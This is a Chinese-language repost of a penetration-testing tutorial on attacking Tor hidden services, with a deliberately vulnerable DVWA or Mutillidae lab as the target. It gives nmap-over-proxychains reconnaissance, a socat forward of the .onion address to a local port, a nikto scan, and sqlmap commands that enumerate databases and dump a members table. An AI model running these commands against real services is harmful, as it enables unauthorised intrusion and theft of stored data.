How to Hack TOR Hidden Services

https://null-byte.wonderhowto.com/how-to/hack-tor-hidden-services-0166673/

一些人认为Tor服务是不可能被黑的,因为它是在一个安全的环境中。但,事实是那些服务和运行的正常服务一样,也能使用渗透工具进行攻击。仅仅需要所有的流量通过Tor网络到隐藏服务。

怎么做呢?

具体有以下工具被使用:socat(转发当地机器到隐藏服务上),nikto,sqlmap。以上工具Kali都是默认安装的。

第一步:开启隐藏服务

使用DVWA或者mutillidae做隐藏服务。

第二步:侦查隐藏服务,

确认服务开启的端口,设置转发从隐藏服务到我们的机器。可以使用prozychaons4 nmap -sT-PN -sV --open -n l3fmwusq3prwkxrv.onion

来确认开放的端口。

注意proxychains4的设置要走TOR网络。

命令格式:

socat TCP4-LISTEN:,reuseaddr,fork SOCKS4A:127.0.0.1::,socksport=

例:

socat TCP4-LISTEN:8000,reuseaddr,fork SOCKS4A:127.0.0.1:l3fmwusq3prwkxrv.onion:80,socksport=9050

这样,开启转发隐藏服务到本地的8000端口。

打开另一个终端,运行

nikto -h http://127.0.0.1:8000

第三步:爆破隐藏服务的数据库。

sqlmap -u "http://127.0.0.1:8000/login.jsp" --data "uname=test&pass=test" --dbs

sqlmap -u "http://127.0.0.1:8000/login.jsp" --data "uname=test&pass=test" -D prototypes --tables

sqlmap -u "http://127.0.0.1:8000/login.jsp" --data "uname=test&pass=test" -T members --dump

实际上隐藏服务和正常网络一样,一旦找到具体地址,有漏洞都可以被正常渗透。不过,事实上任何服务的协议是TCP (UDP和ICMP不能通过TOR).

可以prozychaons4 使用渗透工具,注意proxychains4的设置要走TOR网络。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180524G0M6ZY00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券